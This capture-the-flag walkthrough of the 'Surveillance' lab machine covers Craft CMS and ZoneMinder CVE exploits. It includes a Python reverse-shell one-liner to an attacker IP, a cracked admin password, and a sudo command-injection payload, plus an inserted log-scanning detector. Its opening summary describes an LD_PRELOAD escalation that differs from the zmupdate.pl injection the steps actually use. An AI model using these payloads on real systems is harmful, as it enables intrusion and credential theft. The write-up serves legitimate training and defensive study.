Surveillance - Walkthrough

Surveillance is a medium-difficulty Linux machine that showcases CVE-2023-41892, a vulnerability in Craft CMS that abuses PHP object injection to write PHP content into the Craft CMS web log files and thereby gain Remote Code Execution (RCE). The privilege escalation abuses ZoneMinder, using an authenticated remote code injection in the HostController.php API endpoint to gain a shell as the zoneminder user. As this user, a sudo entry is abused by adding the LD_PRELOAD configuration environment variable via the admin panel and loading a malicious library file through zmdc.pl on the target, compromising the system.

Reconnaissance

We begin with an Nmap scan to identify open services:

sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn --disable-arp-ping 10.10.11.245 -oG allPorts

The scan reveals:

PORT     STATE  SERVICE
22/tcp   open   ssh
80/tcp   open   http

A targeted scan provides more details:

sudo nmap -p22,80 -sCV 10.10.11.245 -oN targeted
  • SSH → OpenSSH 8.9p1 Ubuntu 3ubuntu0.4
  • HTTP → Nginx 1.18.0, redirecting to surveillance.htb

We add the hostname to /etc/hosts:

sudo sh -c 'echo "10.10.11.245 surveillance.htb" >> /etc/hosts'

surveillance.htb

Foothold

The website runs Craft CMS 4.4.14, which is vulnerable to CVE-2023-41892 (Unauthenticated RCE).

We use a public exploit:

python3 51918.py http://surveillance.htb/

The exploit creates a webshell at /shell.php, allowing command execution.
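From the defender's side, the two traces this chain leaves are the `conditions/render` request used by the public exploit and PHP tags landing in a log file, followed by requests to a PHP file Craft never served. The scanner below is an added example, not part of the original walkthrough; the log lines it runs over are constructed, and it assumes nginx access logs and Craft's web log are available as plain text.

```python
import re

# Signatures for the CVE-2023-41892 chain described above.
PHP_TAG = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)          # PHP code written into a log
CONDITIONS_RENDER = re.compile(r"action=conditions(?:/|%2F)render", re.IGNORECASE)
PHP_REQUEST = re.compile(r'"(?:GET|POST) (/[^"?\s]*\.php)(\?[^"\s]*)? HTTP/')
KNOWN_PHP = frozenset({"/index.php"})  # Craft's only legitimate PHP entry point

def scan_lines(lines):
    """Return one finding dict per suspicious log line (line numbers are 1-based)."""
    findings = []
    for number, line in enumerate(lines, start=1):
        if PHP_TAG.search(line):
            findings.append({"line": number, "type": "php-tag-in-log"})
        if CONDITIONS_RENDER.search(line):
            findings.append({"line": number, "type": "conditions-render-request"})
        m = PHP_REQUEST.search(line)
        if m and m.group(1) not in KNOWN_PHP:
            # A PHP file outside the known set is the dropped webshell being used.
            findings.append({"line": number, "type": "unexpected-php-file", "path": m.group(1)})
    return findings

# Constructed sample: one benign request, the exploit request, the injected
# PHP in Craft's web log, and a request to the resulting webshell.
SAMPLE_LOG = [
    '10.10.14.6 - - [17/Oct/2023:20:30:00 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '10.10.14.6 - - [17/Oct/2023:20:30:01 +0000] "POST /index.php?action=conditions/render HTTP/1.1" 200 512 "-" "python-requests/2.31.0"',
    '2023-10-17 20:30:02 [web.ERROR] ... <?php echo "injected"; ?>',
    '10.10.14.6 - - [17/Oct/2023:20:30:03 +0000] "GET /shell.php?cmd=id HTTP/1.1" 200 64 "-" "python-requests/2.31.0"',
]

if __name__ == "__main__":
    for finding in scan_lines(SAMPLE_LOG):
        print(finding)
```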

We inject a Python reverse shell:

export RHOST="10.10.14.6";export RPORT=5000;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'

Post-Exploitation

We stabilize the shell and enumerate the system. In the backups directory we find a database dump, which we serve from the target on port 7000, download to our machine and extract:

wget http://10.10.11.245:7000/surveillance--2023-10-17-202801--v4.4.14.sql.zip
unzip surveillance--2023-10-17-202801--v4.4.14.sql.zip

Extracting the admin hash:

INSERT INTO `users` VALUES (1,NULL,1,0,0,0,1,'admin','Matthew B','Matthew','B','[email protected]','39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec','2023-10-17 20:22:34',NULL,NULL,NULL,'2023-10-11 18:58:57',NULL,1,NULL,NULL,NULL,0,'2023-10-17 20:27:46','2023-10-11 17:57:16','2023-10-17 20:27:46');

We crack the SHA-256 hash:

hashcat hash.txt -m 1400 /usr/share/wordlists/rockyou.txt
39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec:starcraft122490
Username   Password
matthew    starcraft122490

We SSH as matthew and capture the user flag:

cat user.txt

User flag: 61b25f96f74b80c7960c40f5af445bdf

Privilege Escalation

Enumerating the system, we discover ZoneMinder listening locally on port 2222. The installed version is vulnerable to CVE-2023-26035 (authenticated RCE).

We execute the exploit:

python3 exploit.py -t http://127.0.0.1:2222/ -i 10.10.14.6 -p 7777

We gain a shell as the zoneminder user. The user can run /usr/bin/zmupdate.pl as root with sudo.

We exploit this to gain root access:

sudo /usr/bin/zmupdate.pl --version=1 --user='$(/bin/bash -i)' --pass=ZoneMinderPassword2023

We obtain a root shell and capture the flag:

cat /root/root.txt

Root flag: 42a331e03dcb97f8dcaf335eb62950e4